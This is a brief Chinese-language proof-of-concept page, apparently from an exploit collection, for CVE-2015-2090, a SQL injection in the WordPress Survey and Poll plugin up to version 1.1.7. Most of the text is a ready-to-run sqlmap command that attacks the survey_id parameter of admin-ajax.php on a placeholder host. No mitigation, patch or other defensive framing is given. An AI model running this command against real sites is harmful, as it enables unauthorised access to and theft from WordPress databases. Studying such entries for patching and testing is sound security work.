本页总览CVE-2015-2090 WordPress p-admin/admin-ajax.php 存在sql注入影响范围Survey and Poll <= 1.1.7POC利用Sqlmap跑sqlmap -u "http://ip/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql
